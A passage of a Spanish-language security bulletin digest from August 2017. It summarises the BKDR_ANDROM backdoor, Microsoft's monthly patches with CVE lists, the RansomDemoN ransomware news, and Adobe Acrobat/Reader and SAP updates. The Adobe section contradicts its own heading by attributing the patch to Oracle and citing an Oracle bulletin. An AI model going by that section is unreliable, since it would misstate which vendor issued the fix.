BKDR_ANDROM recopilará información sensible sobre el sistema y la enviará al C&C antes de cerrar todos los procesos powershell.exe y borrar todo rastro del virus.
Recomendación
  • Como contramedidas se propone utilizar sistemas basados en contenedores en los puntos más críticos de la red.
Más información
Fuente: Hispasec

MICROSOFT. Boletines de seguridad de agosto de 2017

La publicación mensual de actualizaciones de seguridad de Microsoft este mes consta de 48 vulnerabilidades, 25 clasificadas como críticas, 21 como importantes y 2 como moderadas, catalogadas de Importancia: 5 - Crítica
Recursos afectados:
  1. Adobe Flash Player
  2. Internet Explorer 10
  3. Internet Explorer 11
  4. Internet Explorer 9
  5. Microsoft Edge
  6. Microsoft Office 2010 Click-to-Run (C2R) for 32-bit editions
  7. Microsoft Office 2010 Click-to-Run (C2R) for 64-bit editions
  8. Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions
  9. Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions
  10. Microsoft Office 2016 Click-to-Run (C2R) for 32-bit editions
  11. Microsoft Office 2016 Click-to-Run (C2R) for 64-bit editions
  12. Microsoft Outlook 2007 Service Pack 3
  13. Microsoft Outlook 2010 Service Pack 2 (32-bit editions)
  14. Microsoft Outlook 2010 Service Pack 2 (64-bit editions)
  15. Microsoft Outlook 2013 RT Service Pack 1
  16. Microsoft Outlook 2013 Service Pack 1 (32-bit editions)
  17. Microsoft Outlook 2013 Service Pack 1 (64-bit editions)
  18. Microsoft Outlook 2016 (32-bit edition)
  19. Microsoft Outlook 2016 (64-bit edition)
  20. Microsoft SharePoint Server 2010 Service Pack 2
  21. Microsoft SQL Server 2012 for 32-bit Systems Service Pack 3
  22. Microsoft SQL Server 2012 for 32-bit Systems Service Pack 3 (CU)
  23. Microsoft SQL Server 2012 for x64-based Systems Service Pack 3
  24. Microsoft SQL Server 2012 for x64-based Systems Service Pack 3 (CU)
  25. Microsoft SQL Server 2014 Service Pack 1 for 32-bit Systems
  26. Microsoft SQL Server 2014 Service Pack 1 for 32-bit Systems (CU)
  27. Microsoft SQL Server 2014 Service Pack 1 for x64-based Systems
  28. Microsoft SQL Server 2014 Service Pack 1 for x64-based Systems (CU)
  29. Microsoft SQL Server 2014 Service Pack 2 for 32-bit Systems
  30. Microsoft SQL Server 2014 Service Pack 2 for 32-bit Systems (CU)
  31. Microsoft SQL Server 2014 Service Pack 2 for x64-based Systems
  32. Microsoft SQL Server 2014 Service Pack 2 for x64-based Systems (CU)
  33. Microsoft SQL Server 2016 for x64-based Systems
  34. Microsoft SQL Server 2016 for x64-based Systems (CU)
  35. Microsoft SQL Server 2016 for x64-based Systems Service Pack 1
  36. Microsoft SQL Server 2016 for x64-based Systems Service Pack 1 (CU)
  37. Windows 10 for 32-bit Systems
  38. Windows 10 for x64-based Systems
  39. Windows 10 Version 1511 for 32-bit Systems
  40. Windows 10 Version 1511 for x64-based Systems
  41. Windows 10 Version 1607 for 32-bit Systems
  42. Windows 10 Version 1607 for x64-based Systems
  43. Windows 10 Version 1703 for 32-bit Systems
  44. Windows 10 Version 1703 for x64-based Systems
  45. Windows 7 for 32-bit Systems Service Pack 1
  46. Windows 7 for x64-based Systems Service Pack 1
  47. Windows 8.1 for 32-bit systems
  48. Windows 8.1 for x64-based systems
  49. Windows RT 8.1
  50. Windows Server 2008 for 32-bit Systems Service Pack 2
  51. Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  52. Windows Server 2008 for Itanium-Based Systems Service Pack 2
  53. Windows Server 2008 for x64-based Systems Service Pack 2
  54. Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  55. Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
  56. Windows Server 2008 R2 for x64-based Systems Service Pack 1
  57. Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  58. Windows Server 2012
  59. Windows Server 2012 (Server Core installation)
  60. Windows Server 2012 R2
  61. Windows Server 2012 R2 (Server Core installation)
  62. Windows Server 2016
  63. Windows Server 2016  (Server Core installation)
Para conocer el detalle de las versiones afectadas de cada software, por favor, consulte los enlaces de la sección "Más información".
Detalle de las actualizaciones
En el boletín de actualizaciones de seguridad correspondiente al mes de agosto se han publicado vulnerabilidades de seguridad de los siguientes tipos:
  • Denegación de servicio: CVE-2017-0174; CVE-2017-8623; CVE-2017-8627; CVE-2017-8673
  • Elevación de privilegios: CVE-2017-8593; CVE-2017-8622 (Crítica); CVE-2017-8624; CVE-2017-8633
  • Divulgación de información: CVE-2017-8666; CVE-2017-8668
  • Ejecución remota de código: CVE-2017-0250 (Crítica); CVE-2017-0293 (Crítica); CVE-2017-8591 (Crítica); CVE-2017-8620 (Crítica); CVE-2017-8664; CVE-2017-8691
Recomendación
  • Instalar la actualización correspondiente. En el resumen de los boletines de seguridad de Microsoft, se informa de los distintos métodos de actualización dentro de cada boletín.
Más información
Fuente: Hispasec

RANSOMWARE. Nuevo malware pide a potenciales víctimas encriptar sus propios archivos

El éxito de RansonDemoN depende del número de usuarios que acepten hacer clic en un botón que encriptará sus propios archivos.
Algunas versiones de ransomware tienen mejores posibilidades de tener éxito que otras. RansomDemoN es un malware rudimentario en grado tal que pide a los propios usuarios de PC infectados convertirse en sus víctimas haciendo clic en un botón que dice “encriptar”.
Con ello, RansomDemoN se convierte en un ransomware inofensivo a menos, claro está, que haya usuarios que por distracción, curiosidad o simple estupidez hagan clic en el botón.
Si en este sentido los creadores del malware destacan por su originalidad, lo mismo ocurre con la advertencia de rescate presentada por RansomDemoN. La ventana que genera el malware una vez instalado es idéntica a la del célebre WannaCry, que causó estragos en mayo pasado en un gran número de empresas e instituciones de todo el mundo. Así lo demuestra una captura tomada por la empresa de seguridad MalwareHunters, utilizada en la ilustración de este artículo.
Después de analizar el código del ransomware, MalwareHunters concluye que, básicamente, se trata de un proyecto de recortar y pegar; es decir, el código está casi totalmente basado en WannaCry.
Junto al botón de “encriptar”, el malware incluye un botón con el texto “Pay”, vinculado a una cuenta de Bitcoin. Así, la segunda parte de la descabellada propuesta de RansomDemoN es que una vez que los usuarios se hayan autoinfligido un perjuicio, al cifrar sus propios archivos, luego estén dispuestos a pagar a terceros por recuperar sus datos.
Fuente: Diarioti.com

Actualizaciones críticas Adobe Acrobat y Reader

Oracle ha publicado una actualización crítica con parches para corregir vulnerabilidades que afectan a múltiples productos, catalogada de Importancia: 5 - Crítica
Recursos afectados:
Los recursos afectados tanto para la plataforma Windows como Macintosh son los siguientes:
1.    Acrobat DC (Continuous Track), versión 2017.009.20058 y anteriores.
2.    Acrobat Reader DC (Continuous Track) versión 2017.009.20058 y anteriores.
3.    Acrobat 2017 versión 2017.008.30051 y anteriores.
4.    Acrobat Reader 2017 versión 2017.008.30051 y anteriores.
5.    Acrobat DC (Classic Track) versión 2015.006.30306 y anteriores.
6.    Acrobat Reader DC (Classic Track) versión 2015.006.30306 y anteriores.
7.    Acrobat XI versión 11.0.20 y anteriores.
8.    Reader XI versión 11.0.20 y anteriores.
Recomendación
Aplicar los parches correspondientes según el/los productos afectados. La información para descargar las actualizaciones puede obtenerse del boletín de seguridad publicado por Oracle y cuyo enlace se proporciona en la sección "Solution" de este mismo aviso.
Detalle de la actualización
Esta actualización resuelve un total de 67 vulnerabilidades, siendo 43 criticas y 24 categorizadas como importantes. El detalle de las vulnerabilidades resueltas se puede consultar en el enlace de Oracle de la sección de "Vulnerability Details".
Más información
Fuente: INCIBE

Actualización de seguridad de SAP de agosto 2017

SAP han corregido múltiples vulnerabilidades de seguridad en diferentes productos, la actualización de ha catalogado de Importancia: 4 - Alta
Recursos afectados:
  1. SAP NetWeaver AS Java Web Container
  2. Visual composer
  3. SAP BusinessObjects
  4. SAP NetWeaver Java Server
  5. SAP Sybase
  6. SAP CRM WebClient User Interface
  7. SAP CRM IPC Pricing
  8. SAP CRM WebClient UI
  9. SAP NetWeaver Business Client
  10. SAP SRM Live Auction Application
  11. Adobe Document Services
  12. Web Intelligence BI Launchpad
  13. SAP NetWeaver
  14. SAP NetWeaver Logon Application
  15. SAP NetWeaver K.M. Web Page Composer
  16. ABAP Workbench
Detalle e impacto de las vulnerabilidades
  • SAP, en su comunicado mensual de privacidad ha publicado un total de 16 actualizaciones, siendo 3 de ellas de criticidad alta, 11 de criticidad media y 2 calificadas con criticidad baja.
  • Las notas de seguridad calificadas como altas se refieren a:
  • Vulnerabilidad de inyección de código en Visual Composer, la cual permite a un atacante introducir código malicioso en el "back end" de la aplicación
  • Vulnerabilidad de directorio transversal en SAP NetWeaver, la cual afecta a la confidencialidad de la información al permitir al atacante obtener acceso a archivos aleatorios.
  • Vulnerabilidad Cross-Site en peticiones de AJAX que afecta a SAP BusinessObjects, a través de la cual un atacante podría llegar a inyectar algún tipo de script malicioso dentro de la página.
Recomendación
  • Visitar el  portal de soporte de SAP e instalar actualizaciones o parches necesarios según indique el fabricante desde (  https://support.sap.com/ )
Más información
Fuente: INCIBE